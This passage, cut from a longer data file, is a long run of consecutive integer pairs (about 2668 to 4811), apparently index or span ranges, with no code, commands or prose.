2668,2669],[2669,2670],[2670,2671],[2671,2672],[2672,2673],[2673,2674],[2674,2675],[2675,2676],[2676,2677],[2677,2678],[2678,2679],[2679,2680],[2680,2681],[2681,2682],[2682,2683],[2683,2684],[2684,2685],[2685,2686],[2686,2687],[2687,2688],[2688,2689],[2689,2690],[2690,2691],[2691,2692],[2692,2693],[2693,2694],[2694,2695],[2695,2696],[2696,2697],[2697,2698],[2698,2699],[2699,2700],[2700,2701],[2701,2702],[2702,2703],[2703,2704],[2704,2705],[2705,2706],[2706,2707],[2707,2708],[2708,2709],[2709,2710],[2710,2711],[2711,2712],[2712,2713],[2713,2714],[2714,2715],[2715,2716],[2716,2717],[2717,2718],[2718,2719],[2719,2720],[2720,2721],[2721,2722],[2722,2723],[2723,2724],[2724,2725],[2725,2726],[2726,2727],[2727,2728],[2728,2729],[2729,2730],[2730,2731],[2731,2732],[2732,2733],[2733,2734],[2734,2735],[2735,2736],[2736,2737],[2737,2738],[2738,2739],[2739,2740],[2740,2741],[2741,2742],[2742,2743],[2743,2744],[2744,2745],[2745,2746],[2746,2747],[2747,2748],[2748,2749],[2749,2750],[2750,2751],[2751,2752],[2752,2753],[2753,2754],[2754,2755],[2755,2756],[2756,2757],[2757,2758],[2758,2759],[2759,2760],[2760,2761],[2761,2762],[2762,2763],[2763,2764],[2764,2765],[2765,2766],[2766,2767],[2767,2768],[2768,2769],[2769,2770],[2770,2771],[2771,2772],[2772,2773],[2773,2774],[2774,2775],[2775,2776],[2776,2777],[2777,2778],[2778,2779],[2779,2780],[2780,2781],[2781,2782],[2782,2783],[2783,2784],[2784,2785],[2785,2786],[2786,2787],[2787,2788],[2788,2789],[2789,2790],[2790,2791],[2791,2792],[2792,2793],[2793,2794],[2794,2795],[2795,2796],[2796,2797],[2797,2798],[2798,2799],[2799,2800],[2800,2801],[2801,2802],[2802,2803],[2803,2804],[2804,2805],[2805,2806],[2806,2807],[2807,2808],[2808,2809],[2809,2810],[2810,2811],[2811,2812],[2812,2813],[2813,2814],[2814,2815],[2815,2816],[2816,2817],[2817,2818],[2818,2819],[2819,2820],[2820,2821],[2821,2822],[2822,2823],[2823,2824],[2824,2825],[2825,2826],[2826,2827],[2827,2828],[2828,2829],[2829,2830],[2830,2831],[2831,2832],[2832,2833],[2833,2834],[2834,2835],[2835,2836],[2836,2837],[2837,2838],[2838,2839],[2839,2840],[2840,2841],[2841,2842],[2842,2843],[2843,2844],[2844,2845],[2845,2846],[2846,2847],[2847,2848],[2848,2849],[2849,2850],[2850,2851],[2851,2852],[2852,2853],[2853,2854],[2854,2855],[2855,2856],[2856,2857],[2857,2858],[2858,2859],[2859,2860],[2860,2861],[2861,2862],[2862,2863],[2863,2864],[2864,2865],[2865,2866],[2866,2867],[2867,2868],[2868,2869],[2869,2870],[2870,2871],[2871,2872],[2872,2873],[2873,2874],[2874,2875],[2875,2876],[2876,2877],[2877,2878],[2878,2879],[2879,2880],[2880,2881],[2881,2882],[2882,2883],[2883,2884],[2884,2885],[2885,2886],[2886,2887],[2887,2888],[2888,2889],[2889,2890],[2890,2891],[2891,2892],[2892,2893],[2893,2894],[2894,2895],[2895,2896],[2896,2897],[2897,2898],[2898,2899],[2899,2900],[2900,2901],[2901,2902],[2902,2903],[2903,2904],[2904,2905],[2905,2906],[2906,2907],[2907,2908],[2908,2909],[2909,2910],[2910,2911],[2911,2912],[2912,2913],[2913,2914],[2914,2915],[2915,2916],[2916,2917],[2917,2918],[2918,2919],[2919,2920],[2920,2921],[2921,2922],[2922,2923],[2923,2924],[2924,2925],[2925,2926],[2926,2927],[2927,2928],[2928,2929],[2929,2930],[2930,2931],[2931,2932],[2932,2933],[2933,2934],[2934,2935],[2935,2936],[2936,2937],[2937,2938],[2938,2939],[2939,2940],[2940,2941],[2941,2942],[2942,2943],[2943,2944],[2944,2945],[2945,2946],[2946,2947],[2947,2948],[2948,2949],[2949,2950],[2950,2951],[2951,2952],[2952,2953],[2953,2954],[2954,2955],[2955,2956],[2956,2957],[2957,2958],[2958,2959],[2959,2960],[2960,2961],[2961,2962],[2962,2963],[2963,2964],[2964,2965],[2965,2966],[2966,2967],[2967,2968],[2968,2969],[2969,2970],[2970,2971],[2971,2972],[2972,2973],[2973,2974],[2974,2975],[2975,2976],[2976,2977],[2977,2978],[2978,2979],[2979,2980],[2980,2981],[2981,2982],[2982,2983],[2983,2984],[2984,2985],[2985,2986],[2986,2987],[2987,2988],[2988,2989],[2989,2990],[2990,2991],[2991,2992],[2992,2993],[2993,2994],[2994,2995],[2995,2996],[2996,2997],[2997,2998],[2998,2999],[2999,3000],[3000,3001],[3001,3002],[3002,3003],[3003,3004],[3004,3005],[3005,3006],[3006,3007],[3007,3008],[3008,3009],[3009,3010],[3010,3011],[3011,3012],[3012,3013],[3013,3014],[3014,3015],[3015,3016],[3016,3017],[3017,3018],[3018,3019],[3019,3020],[3020,3021],[3021,3022],[3022,3023],[3023,3024],[3024,3025],[3025,3026],[3026,3027],[3027,3028],[3028,3029],[3029,3030],[3030,3031],[3031,3032],[3032,3033],[3033,3034],[3034,3035],[3035,3036],[3036,3037],[3037,3038],[3038,3039],[3039,3040],[3040,3041],[3041,3042],[3042,3043],[3043,3044],[3044,3045],[3045,3046],[3046,3047],[3047,3048],[3048,3049],[3049,3050],[3050,3051],[3051,3052],[3052,3053],[3053,3054],[3054,3055],[3055,3056],[3056,3057],[3057,3058],[3058,3059],[3059,3060],[3060,3061],[3061,3062],[3062,3063],[3063,3064],[3064,3065],[3065,3066],[3066,3067],[3067,3068],[3068,3069],[3069,3070],[3070,3071],[3071,3072],[3072,3073],[3073,3074],[3074,3075],[3075,3076],[3076,3077],[3077,3078],[3078,3079],[3079,3080],[3080,3081],[3081,3082],[3082,3083],[3083,3084],[3084,3085],[3085,3086],[3086,3087],[3087,3088],[3088,3089],[3089,3090],[3090,3091],[3091,3092],[3092,3093],[3093,3094],[3094,3095],[3095,3096],[3096,3097],[3097,3098],[3098,3099],[3099,3100],[3100,3101],[3101,3102],[3102,3103],[3103,3104],[3104,3105],[3105,3106],[3106,3107],[3107,3108],[3108,3109],[3109,3110],[3110,3111],[3111,3112],[3112,3113],[3113,3114],[3114,3115],[3115,3116],[3116,3117],[3117,3118],[3118,3119],[3119,3120],[3120,3121],[3121,3122],[3122,3123],[3123,3124],[3124,3125],[3125,3126],[3126,3127],[3127,3128],[3128,3129],[3129,3130],[3130,3131],[3131,3132],[3132,3133],[3133,3134],[3134,3135],[3135,3136],[3136,3137],[3137,3138],[3138,3139],[3139,3140],[3140,3141],[3141,3142],[3142,3143],[3143,3144],[3144,3145],[3145,3146],[3146,3147],[3147,3148],[3148,3149],[3149,3150],[3150,3151],[3151,3152],[3152,3153],[3153,3154],[3154,3155],[3155,3156],[3156,3157],[3157,3158],[3158,3159],[3159,3160],[3160,3161],[3161,3162],[3162,3163],[3163,3164],[3164,3165],[3165,3166],[3166,3167],[3167,3168],[3168,3169],[3169,3170],[3170,3171],[3171,3172],[3172,3173],[3173,3174],[3174,3175],[3175,3176],[3176,3177],[3177,3178],[3178,3179],[3179,3180],[3180,3181],[3181,3182],[3182,3183],[3183,3184],[3184,3185],[3185,3186],[3186,3187],[3187,3188],[3188,3189],[3189,3190],[3190,3191],[3191,3192],[3192,3193],[3193,3194],[3194,3195],[3195,3196],[3196,3197],[3197,3198],[3198,3199],[3199,3200],[3200,3201],[3201,3202],[3202,3203],[3203,3204],[3204,3205],[3205,3206],[3206,3207],[3207,3208],[3208,3209],[3209,3210],[3210,3211],[3211,3212],[3212,3213],[3213,3214],[3214,3215],[3215,3216],[3216,3217],[3217,3218],[3218,3219],[3219,3220],[3220,3221],[3221,3222],[3222,3223],[3223,3224],[3224,3225],[3225,3226],[3226,3227],[3227,3228],[3228,3229],[3229,3230],[3230,3231],[3231,3232],[3232,3233],[3233,3234],[3234,3235],[3235,3236],[3236,3237],[3237,3238],[3238,3239],[3239,3240],[3240,3241],[3241,3242],[3242,3243],[3243,3244],[3244,3245],[3245,3246],[3246,3247],[3247,3248],[3248,3249],[3249,3250],[3250,3251],[3251,3252],[3252,3253],[3253,3254],[3254,3255],[3255,3256],[3256,3257],[3257,3258],[3258,3259],[3259,3260],[3260,3261],[3261,3262],[3262,3263],[3263,3264],[3264,3265],[3265,3266],[3266,3267],[3267,3268],[3268,3269],[3269,3270],[3270,3271],[3271,3272],[3272,3273],[3273,3274],[3274,3275],[3275,3276],[3276,3277],[3277,3278],[3278,3279],[3279,3280],[3280,3281],[3281,3282],[3282,3283],[3283,3284],[3284,3285],[3285,3286],[3286,3287],[3287,3288],[3288,3289],[3289,3290],[3290,3291],[3291,3292],[3292,3293],[3293,3294],[3294,3295],[3295,3296],[3296,3297],[3297,3298],[3298,3299],[3299,3300],[3300,3301],[3301,3302],[3302,3303],[3303,3304],[3304,3305],[3305,3306],[3306,3307],[3307,3308],[3308,3309],[3309,3310],[3310,3311],[3311,3312],[3312,3313],[3313,3314],[3314,3315],[3315,3316],[3316,3317],[3317,3318],[3318,3319],[3319,3320],[3320,3321],[3321,3322],[3322,3323],[3323,3324],[3324,3325],[3325,3326],[3326,3327],[3327,3328],[3328,3329],[3329,3330],[3330,3331],[3331,3332],[3332,3333],[3333,3334],[3334,3335],[3335,3336],[3336,3337],[3337,3338],[3338,3339],[3339,3340],[3340,3341],[3341,3342],[3342,3343],[3343,3344],[3344,3345],[3345,3346],[3346,3347],[3347,3348],[3348,3349],[3349,3350],[3350,3351],[3351,3352],[3352,3353],[3353,3354],[3354,3355],[3355,3356],[3356,3357],[3357,3358],[3358,3359],[3359,3360],[3360,3361],[3361,3362],[3362,3363],[3363,3364],[3364,3365],[3365,3366],[3366,3367],[3367,3368],[3368,3369],[3369,3370],[3370,3371],[3371,3372],[3372,3373],[3373,3374],[3374,3375],[3375,3376],[3376,3377],[3377,3378],[3378,3379],[3379,3380],[3380,3381],[3381,3382],[3382,3383],[3383,3384],[3384,3385],[3385,3386],[3386,3387],[3387,3388],[3388,3389],[3389,3390],[3390,3391],[3391,3392],[3392,3393],[3393,3394],[3394,3395],[3395,3396],[3396,3397],[3397,3398],[3398,3399],[3399,3400],[3400,3401],[3401,3402],[3402,3403],[3403,3404],[3404,3405],[3405,3406],[3406,3407],[3407,3408],[3408,3409],[3409,3410],[3410,3411],[3411,3412],[3412,3413],[3413,3414],[3414,3415],[3415,3416],[3416,3417],[3417,3418],[3418,3419],[3419,3420],[3420,3421],[3421,3422],[3422,3423],[3423,3424],[3424,3425],[3425,3426],[3426,3427],[3427,3428],[3428,3429],[3429,3430],[3430,3431],[3431,3432],[3432,3433],[3433,3434],[3434,3435],[3435,3436],[3436,3437],[3437,3438],[3438,3439],[3439,3440],[3440,3441],[3441,3442],[3442,3443],[3443,3444],[3444,3445],[3445,3446],[3446,3447],[3447,3448],[3448,3449],[3449,3450],[3450,3451],[3451,3452],[3452,3453],[3453,3454],[3454,3455],[3455,3456],[3456,3457],[3457,3458],[3458,3459],[3459,3460],[3460,3461],[3461,3462],[3462,3463],[3463,3464],[3464,3465],[3465,3466],[3466,3467],[3467,3468],[3468,3469],[3469,3470],[3470,3471],[3471,3472],[3472,3473],[3473,3474],[3474,3475],[3475,3476],[3476,3477],[3477,3478],[3478,3479],[3479,3480],[3480,3481],[3481,3482],[3482,3483],[3483,3484],[3484,3485],[3485,3486],[3486,3487],[3487,3488],[3488,3489],[3489,3490],[3490,3491],[3491,3492],[3492,3493],[3493,3494],[3494,3495],[3495,3496],[3496,3497],[3497,3498],[3498,3499],[3499,3500],[3500,3501],[3501,3502],[3502,3503],[3503,3504],[3504,3505],[3505,3506],[3506,3507],[3507,3508],[3508,3509],[3509,3510],[3510,3511],[3511,3512],[3512,3513],[3513,3514],[3514,3515],[3515,3516],[3516,3517],[3517,3518],[3518,3519],[3519,3520],[3520,3521],[3521,3522],[3522,3523],[3523,3524],[3524,3525],[3525,3526],[3526,3527],[3527,3528],[3528,3529],[3529,3530],[3530,3531],[3531,3532],[3532,3533],[3533,3534],[3534,3535],[3535,3536],[3536,3537],[3537,3538],[3538,3539],[3539,3540],[3540,3541],[3541,3542],[3542,3543],[3543,3544],[3544,3545],[3545,3546],[3546,3547],[3547,3548],[3548,3549],[3549,3550],[3550,3551],[3551,3552],[3552,3553],[3553,3554],[3554,3555],[3555,3556],[3556,3557],[3557,3558],[3558,3559],[3559,3560],[3560,3561],[3561,3562],[3562,3563],[3563,3564],[3564,3565],[3565,3566],[3566,3567],[3567,3568],[3568,3569],[3569,3570],[3570,3571],[3571,3572],[3572,3573],[3573,3574],[3574,3575],[3575,3576],[3576,3577],[3577,3578],[3578,3579],[3579,3580],[3580,3581],[3581,3582],[3582,3583],[3583,3584],[3584,3585],[3585,3586],[3586,3587],[3587,3588],[3588,3589],[3589,3590],[3590,3591],[3591,3592],[3592,3593],[3593,3594],[3594,3595],[3595,3596],[3596,3597],[3597,3598],[3598,3599],[3599,3600],[3600,3601],[3601,3602],[3602,3603],[3603,3604],[3604,3605],[3605,3606],[3606,3607],[3607,3608],[3608,3609],[3609,3610],[3610,3611],[3611,3612],[3612,3613],[3613,3614],[3614,3615],[3615,3616],[3616,3617],[3617,3618],[3618,3619],[3619,3620],[3620,3621],[3621,3622],[3622,3623],[3623,3624],[3624,3625],[3625,3626],[3626,3627],[3627,3628],[3628,3629],[3629,3630],[3630,3631],[3631,3632],[3632,3633],[3633,3634],[3634,3635],[3635,3636],[3636,3637],[3637,3638],[3638,3639],[3639,3640],[3640,3641],[3641,3642],[3642,3643],[3643,3644],[3644,3645],[3645,3646],[3646,3647],[3647,3648],[3648,3649],[3649,3650],[3650,3651],[3651,3652],[3652,3653],[3653,3654],[3654,3655],[3655,3656],[3656,3657],[3657,3658],[3658,3659],[3659,3660],[3660,3661],[3661,3662],[3662,3663],[3663,3664],[3664,3665],[3665,3666],[3666,3667],[3667,3668],[3668,3669],[3669,3670],[3670,3671],[3671,3672],[3672,3673],[3673,3674],[3674,3675],[3675,3676],[3676,3677],[3677,3678],[3678,3679],[3679,3680],[3680,3681],[3681,3682],[3682,3683],[3683,3684],[3684,3685],[3685,3686],[3686,3687],[3687,3688],[3688,3689],[3689,3690],[3690,3691],[3691,3692],[3692,3693],[3693,3694],[3694,3695],[3695,3696],[3696,3697],[3697,3698],[3698,3699],[3699,3700],[3700,3701],[3701,3702],[3702,3703],[3703,3704],[3704,3705],[3705,3706],[3706,3707],[3707,3708],[3708,3709],[3709,3710],[3710,3711],[3711,3712],[3712,3713],[3713,3714],[3714,3715],[3715,3716],[3716,3717],[3717,3718],[3718,3719],[3719,3720],[3720,3721],[3721,3722],[3722,3723],[3723,3724],[3724,3725],[3725,3726],[3726,3727],[3727,3728],[3728,3729],[3729,3730],[3730,3731],[3731,3732],[3732,3733],[3733,3734],[3734,3735],[3735,3736],[3736,3737],[3737,3738],[3738,3739],[3739,3740],[3740,3741],[3741,3742],[3742,3743],[3743,3744],[3744,3745],[3745,3746],[3746,3747],[3747,3748],[3748,3749],[3749,3750],[3750,3751],[3751,3752],[3752,3753],[3753,3754],[3754,3755],[3755,3756],[3756,3757],[3757,3758],[3758,3759],[3759,3760],[3760,3761],[3761,3762],[3762,3763],[3763,3764],[3764,3765],[3765,3766],[3766,3767],[3767,3768],[3768,3769],[3769,3770],[3770,3771],[3771,3772],[3772,3773],[3773,3774],[3774,3775],[3775,3776],[3776,3777],[3777,3778],[3778,3779],[3779,3780],[3780,3781],[3781,3782],[3782,3783],[3783,3784],[3784,3785],[3785,3786],[3786,3787],[3787,3788],[3788,3789],[3789,3790],[3790,3791],[3791,3792],[3792,3793],[3793,3794],[3794,3795],[3795,3796],[3796,3797],[3797,3798],[3798,3799],[3799,3800],[3800,3801],[3801,3802],[3802,3803],[3803,3804],[3804,3805],[3805,3806],[3806,3807],[3807,3808],[3808,3809],[3809,3810],[3810,3811],[3811,3812],[3812,3813],[3813,3814],[3814,3815],[3815,3816],[3816,3817],[3817,3818],[3818,3819],[3819,3820],[3820,3821],[3821,3822],[3822,3823],[3823,3824],[3824,3825],[3825,3826],[3826,3827],[3827,3828],[3828,3829],[3829,3830],[3830,3831],[3831,3832],[3832,3833],[3833,3834],[3834,3835],[3835,3836],[3836,3837],[3837,3838],[3838,3839],[3839,3840],[3840,3841],[3841,3842],[3842,3843],[3843,3844],[3844,3845],[3845,3846],[3846,3847],[3847,3848],[3848,3849],[3849,3850],[3850,3851],[3851,3852],[3852,3853],[3853,3854],[3854,3855],[3855,3856],[3856,3857],[3857,3858],[3858,3859],[3859,3860],[3860,3861],[3861,3862],[3862,3863],[3863,3864],[3864,3865],[3865,3866],[3866,3867],[3867,3868],[3868,3869],[3869,3870],[3870,3871],[3871,3872],[3872,3873],[3873,3874],[3874,3875],[3875,3876],[3876,3877],[3877,3878],[3878,3879],[3879,3880],[3880,3881],[3881,3882],[3882,3883],[3883,3884],[3884,3885],[3885,3886],[3886,3887],[3887,3888],[3888,3889],[3889,3890],[3890,3891],[3891,3892],[3892,3893],[3893,3894],[3894,3895],[3895,3896],[3896,3897],[3897,3898],[3898,3899],[3899,3900],[3900,3901],[3901,3902],[3902,3903],[3903,3904],[3904,3905],[3905,3906],[3906,3907],[3907,3908],[3908,3909],[3909,3910],[3910,3911],[3911,3912],[3912,3913],[3913,3914],[3914,3915],[3915,3916],[3916,3917],[3917,3918],[3918,3919],[3919,3920],[3920,3921],[3921,3922],[3922,3923],[3923,3924],[3924,3925],[3925,3926],[3926,3927],[3927,3928],[3928,3929],[3929,3930],[3930,3931],[3931,3932],[3932,3933],[3933,3934],[3934,3935],[3935,3936],[3936,3937],[3937,3938],[3938,3939],[3939,3940],[3940,3941],[3941,3942],[3942,3943],[3943,3944],[3944,3945],[3945,3946],[3946,3947],[3947,3948],[3948,3949],[3949,3950],[3950,3951],[3951,3952],[3952,3953],[3953,3954],[3954,3955],[3955,3956],[3956,3957],[3957,3958],[3958,3959],[3959,3960],[3960,3961],[3961,3962],[3962,3963],[3963,3964],[3964,3965],[3965,3966],[3966,3967],[3967,3968],[3968,3969],[3969,3970],[3970,3971],[3971,3972],[3972,3973],[3973,3974],[3974,3975],[3975,3976],[3976,3977],[3977,3978],[3978,3979],[3979,3980],[3980,3981],[3981,3982],[3982,3983],[3983,3984],[3984,3985],[3985,3986],[3986,3987],[3987,3988],[3988,3989],[3989,3990],[3990,3991],[3991,3992],[3992,3993],[3993,3994],[3994,3995],[3995,3996],[3996,3997],[3997,3998],[3998,3999],[3999,4000],[4000,4001],[4001,4002],[4002,4003],[4003,4004],[4004,4005],[4005,4006],[4006,4007],[4007,4008],[4008,4009],[4009,4010],[4010,4011],[4011,4012],[4012,4013],[4013,4014],[4014,4015],[4015,4016],[4016,4017],[4017,4018],[4018,4019],[4019,4020],[4020,4021],[4021,4022],[4022,4023],[4023,4024],[4024,4025],[4025,4026],[4026,4027],[4027,4028],[4028,4029],[4029,4030],[4030,4031],[4031,4032],[4032,4033],[4033,4034],[4034,4035],[4035,4036],[4036,4037],[4037,4038],[4038,4039],[4039,4040],[4040,4041],[4041,4042],[4042,4043],[4043,4044],[4044,4045],[4045,4046],[4046,4047],[4047,4048],[4048,4049],[4049,4050],[4050,4051],[4051,4052],[4052,4053],[4053,4054],[4054,4055],[4055,4056],[4056,4057],[4057,4058],[4058,4059],[4059,4060],[4060,4061],[4061,4062],[4062,4063],[4063,4064],[4064,4065],[4065,4066],[4066,4067],[4067,4068],[4068,4069],[4069,4070],[4070,4071],[4071,4072],[4072,4073],[4073,4074],[4074,4075],[4075,4076],[4076,4077],[4077,4078],[4078,4079],[4079,4080],[4080,4081],[4081,4082],[4082,4083],[4083,4084],[4084,4085],[4085,4086],[4086,4087],[4087,4088],[4088,4089],[4089,4090],[4090,4091],[4091,4092],[4092,4093],[4093,4094],[4094,4095],[4095,4096],[4096,4097],[4097,4098],[4098,4099],[4099,4100],[4100,4101],[4101,4102],[4102,4103],[4103,4104],[4104,4105],[4105,4106],[4106,4107],[4107,4108],[4108,4109],[4109,4110],[4110,4111],[4111,4112],[4112,4113],[4113,4114],[4114,4115],[4115,4116],[4116,4117],[4117,4118],[4118,4119],[4119,4120],[4120,4121],[4121,4122],[4122,4123],[4123,4124],[4124,4125],[4125,4126],[4126,4127],[4127,4128],[4128,4129],[4129,4130],[4130,4131],[4131,4132],[4132,4133],[4133,4134],[4134,4135],[4135,4136],[4136,4137],[4137,4138],[4138,4139],[4139,4140],[4140,4141],[4141,4142],[4142,4143],[4143,4144],[4144,4145],[4145,4146],[4146,4147],[4147,4148],[4148,4149],[4149,4150],[4150,4151],[4151,4152],[4152,4153],[4153,4154],[4154,4155],[4155,4156],[4156,4157],[4157,4158],[4158,4159],[4159,4160],[4160,4161],[4161,4162],[4162,4163],[4163,4164],[4164,4165],[4165,4166],[4166,4167],[4167,4168],[4168,4169],[4169,4170],[4170,4171],[4171,4172],[4172,4173],[4173,4174],[4174,4175],[4175,4176],[4176,4177],[4177,4178],[4178,4179],[4179,4180],[4180,4181],[4181,4182],[4182,4183],[4183,4184],[4184,4185],[4185,4186],[4186,4187],[4187,4188],[4188,4189],[4189,4190],[4190,4191],[4191,4192],[4192,4193],[4193,4194],[4194,4195],[4195,4196],[4196,4197],[4197,4198],[4198,4199],[4199,4200],[4200,4201],[4201,4202],[4202,4203],[4203,4204],[4204,4205],[4205,4206],[4206,4207],[4207,4208],[4208,4209],[4209,4210],[4210,4211],[4211,4212],[4212,4213],[4213,4214],[4214,4215],[4215,4216],[4216,4217],[4217,4218],[4218,4219],[4219,4220],[4220,4221],[4221,4222],[4222,4223],[4223,4224],[4224,4225],[4225,4226],[4226,4227],[4227,4228],[4228,4229],[4229,4230],[4230,4231],[4231,4232],[4232,4233],[4233,4234],[4234,4235],[4235,4236],[4236,4237],[4237,4238],[4238,4239],[4239,4240],[4240,4241],[4241,4242],[4242,4243],[4243,4244],[4244,4245],[4245,4246],[4246,4247],[4247,4248],[4248,4249],[4249,4250],[4250,4251],[4251,4252],[4252,4253],[4253,4254],[4254,4255],[4255,4256],[4256,4257],[4257,4258],[4258,4259],[4259,4260],[4260,4261],[4261,4262],[4262,4263],[4263,4264],[4264,4265],[4265,4266],[4266,4267],[4267,4268],[4268,4269],[4269,4270],[4270,4271],[4271,4272],[4272,4273],[4273,4274],[4274,4275],[4275,4276],[4276,4277],[4277,4278],[4278,4279],[4279,4280],[4280,4281],[4281,4282],[4282,4283],[4283,4284],[4284,4285],[4285,4286],[4286,4287],[4287,4288],[4288,4289],[4289,4290],[4290,4291],[4291,4292],[4292,4293],[4293,4294],[4294,4295],[4295,4296],[4296,4297],[4297,4298],[4298,4299],[4299,4300],[4300,4301],[4301,4302],[4302,4303],[4303,4304],[4304,4305],[4305,4306],[4306,4307],[4307,4308],[4308,4309],[4309,4310],[4310,4311],[4311,4312],[4312,4313],[4313,4314],[4314,4315],[4315,4316],[4316,4317],[4317,4318],[4318,4319],[4319,4320],[4320,4321],[4321,4322],[4322,4323],[4323,4324],[4324,4325],[4325,4326],[4326,4327],[4327,4328],[4328,4329],[4329,4330],[4330,4331],[4331,4332],[4332,4333],[4333,4334],[4334,4335],[4335,4336],[4336,4337],[4337,4338],[4338,4339],[4339,4340],[4340,4341],[4341,4342],[4342,4343],[4343,4344],[4344,4345],[4345,4346],[4346,4347],[4347,4348],[4348,4349],[4349,4350],[4350,4351],[4351,4352],[4352,4353],[4353,4354],[4354,4355],[4355,4356],[4356,4357],[4357,4358],[4358,4359],[4359,4360],[4360,4361],[4361,4362],[4362,4363],[4363,4364],[4364,4365],[4365,4366],[4366,4367],[4367,4368],[4368,4369],[4369,4370],[4370,4371],[4371,4372],[4372,4373],[4373,4374],[4374,4375],[4375,4376],[4376,4377],[4377,4378],[4378,4379],[4379,4380],[4380,4381],[4381,4382],[4382,4383],[4383,4384],[4384,4385],[4385,4386],[4386,4387],[4387,4388],[4388,4389],[4389,4390],[4390,4391],[4391,4392],[4392,4393],[4393,4394],[4394,4395],[4395,4396],[4396,4397],[4397,4398],[4398,4399],[4399,4400],[4400,4401],[4401,4402],[4402,4403],[4403,4404],[4404,4405],[4405,4406],[4406,4407],[4407,4408],[4408,4409],[4409,4410],[4410,4411],[4411,4412],[4412,4413],[4413,4414],[4414,4415],[4415,4416],[4416,4417],[4417,4418],[4418,4419],[4419,4420],[4420,4421],[4421,4422],[4422,4423],[4423,4424],[4424,4425],[4425,4426],[4426,4427],[4427,4428],[4428,4429],[4429,4430],[4430,4431],[4431,4432],[4432,4433],[4433,4434],[4434,4435],[4435,4436],[4436,4437],[4437,4438],[4438,4439],[4439,4440],[4440,4441],[4441,4442],[4442,4443],[4443,4444],[4444,4445],[4445,4446],[4446,4447],[4447,4448],[4448,4449],[4449,4450],[4450,4451],[4451,4452],[4452,4453],[4453,4454],[4454,4455],[4455,4456],[4456,4457],[4457,4458],[4458,4459],[4459,4460],[4460,4461],[4461,4462],[4462,4463],[4463,4464],[4464,4465],[4465,4466],[4466,4467],[4467,4468],[4468,4469],[4469,4470],[4470,4471],[4471,4472],[4472,4473],[4473,4474],[4474,4475],[4475,4476],[4476,4477],[4477,4478],[4478,4479],[4479,4480],[4480,4481],[4481,4482],[4482,4483],[4483,4484],[4484,4485],[4485,4486],[4486,4487],[4487,4488],[4488,4489],[4489,4490],[4490,4491],[4491,4492],[4492,4493],[4493,4494],[4494,4495],[4495,4496],[4496,4497],[4497,4498],[4498,4499],[4499,4500],[4500,4501],[4501,4502],[4502,4503],[4503,4504],[4504,4505],[4505,4506],[4506,4507],[4507,4508],[4508,4509],[4509,4510],[4510,4511],[4511,4512],[4512,4513],[4513,4514],[4514,4515],[4515,4516],[4516,4517],[4517,4518],[4518,4519],[4519,4520],[4520,4521],[4521,4522],[4522,4523],[4523,4524],[4524,4525],[4525,4526],[4526,4527],[4527,4528],[4528,4529],[4529,4530],[4530,4531],[4531,4532],[4532,4533],[4533,4534],[4534,4535],[4535,4536],[4536,4537],[4537,4538],[4538,4539],[4539,4540],[4540,4541],[4541,4542],[4542,4543],[4543,4544],[4544,4545],[4545,4546],[4546,4547],[4547,4548],[4548,4549],[4549,4550],[4550,4551],[4551,4552],[4552,4553],[4553,4554],[4554,4555],[4555,4556],[4556,4557],[4557,4558],[4558,4559],[4559,4560],[4560,4561],[4561,4562],[4562,4563],[4563,4564],[4564,4565],[4565,4566],[4566,4567],[4567,4568],[4568,4569],[4569,4570],[4570,4571],[4571,4572],[4572,4573],[4573,4574],[4574,4575],[4575,4576],[4576,4577],[4577,4578],[4578,4579],[4579,4580],[4580,4581],[4581,4582],[4582,4583],[4583,4584],[4584,4585],[4585,4586],[4586,4587],[4587,4588],[4588,4589],[4589,4590],[4590,4591],[4591,4592],[4592,4593],[4593,4594],[4594,4595],[4595,4596],[4596,4597],[4597,4598],[4598,4599],[4599,4600],[4600,4601],[4601,4602],[4602,4603],[4603,4604],[4604,4605],[4605,4606],[4606,4607],[4607,4608],[4608,4609],[4609,4610],[4610,4611],[4611,4612],[4612,4613],[4613,4614],[4614,4615],[4615,4616],[4616,4617],[4617,4618],[4618,4619],[4619,4620],[4620,4621],[4621,4622],[4622,4623],[4623,4624],[4624,4625],[4625,4626],[4626,4627],[4627,4628],[4628,4629],[4629,4630],[4630,4631],[4631,4632],[4632,4633],[4633,4634],[4634,4635],[4635,4636],[4636,4637],[4637,4638],[4638,4639],[4639,4640],[4640,4641],[4641,4642],[4642,4643],[4643,4644],[4644,4645],[4645,4646],[4646,4647],[4647,4648],[4648,4649],[4649,4650],[4650,4651],[4651,4652],[4652,4653],[4653,4654],[4654,4655],[4655,4656],[4656,4657],[4657,4658],[4658,4659],[4659,4660],[4660,4661],[4661,4662],[4662,4663],[4663,4664],[4664,4665],[4665,4666],[4666,4667],[4667,4668],[4668,4669],[4669,4670],[4670,4671],[4671,4672],[4672,4673],[4673,4674],[4674,4675],[4675,4676],[4676,4677],[4677,4678],[4678,4679],[4679,4680],[4680,4681],[4681,4682],[4682,4683],[4683,4684],[4684,4685],[4685,4686],[4686,4687],[4687,4688],[4688,4689],[4689,4690],[4690,4691],[4691,4692],[4692,4693],[4693,4694],[4694,4695],[4695,4696],[4696,4697],[4697,4698],[4698,4699],[4699,4700],[4700,4701],[4701,4702],[4702,4703],[4703,4704],[4704,4705],[4705,4706],[4706,4707],[4707,4708],[4708,4709],[4709,4710],[4710,4711],[4711,4712],[4712,4713],[4713,4714],[4714,4715],[4715,4716],[4716,4717],[4717,4718],[4718,4719],[4719,4720],[4720,4721],[4721,4722],[4722,4723],[4723,4724],[4724,4725],[4725,4726],[4726,4727],[4727,4728],[4728,4729],[4729,4730],[4730,4731],[4731,4732],[4732,4733],[4733,4734],[4734,4735],[4735,4736],[4736,4737],[4737,4738],[4738,4739],[4739,4740],[4740,4741],[4741,4742],[4742,4743],[4743,4744],[4744,4745],[4745,4746],[4746,4747],[4747,4748],[4748,4749],[4749,4750],[4750,4751],[4751,4752],[4752,4753],[4753,4754],[4754,4755],[4755,4756],[4756,4757],[4757,4758],[4758,4759],[4759,4760],[4760,4761],[4761,4762],[4762,4763],[4763,4764],[4764,4765],[4765,4766],[4766,4767],[4767,4768],[4768,4769],[4769,4770],[4770,4771],[4771,4772],[4772,4773],[4773,4774],[4774,4775],[4775,4776],[4776,4777],[4777,4778],[4778,4779],[4779,4780],[4780,4781],[4781,4782],[4782,4783],[4783,4784],[4784,4785],[4785,4786],[4786,4787],[4787,4788],[4788,4789],[4789,4790],[4790,4791],[4791,4792],[4792,4793],[4793,4794],[4794,4795],[4795,4796],[4796,4797],[4797,4798],[4798,4799],[4799,4800],[4800,4801],[4801,4802],[4802,4803],[4803,4804],[4804,4805],[4805,4806],[4806,4807],[4807,4808],[4808,4809],[4809,4810],[4810,4811],